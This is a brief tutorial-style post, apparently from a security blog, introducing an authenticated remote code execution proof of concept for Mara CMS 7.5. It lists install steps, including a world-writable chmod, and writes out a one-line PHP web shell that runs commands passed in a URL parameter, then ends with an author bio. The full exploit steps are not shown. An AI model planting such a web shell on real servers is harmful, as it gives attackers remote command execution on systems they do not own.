Hey Folks, In this tutorial we will show you the (POC) of Mara CMS 7.5 Remote Code Execution (Authenticated) Vulnerability.
About the Vulnerability
Exploit Author : Michele Cisternino (0blio_)
Download : https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
Version : 7.5
Tested on: Ubuntu
unzip -d /var/www/html/MaraCMS75/ MaraCMS75.zip
chmod 777 *
mv example.htaccess .htaccess
cat > webshell.php
'<?php system($_GET["cmd"]); ?>'
Full Proof of Concept
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.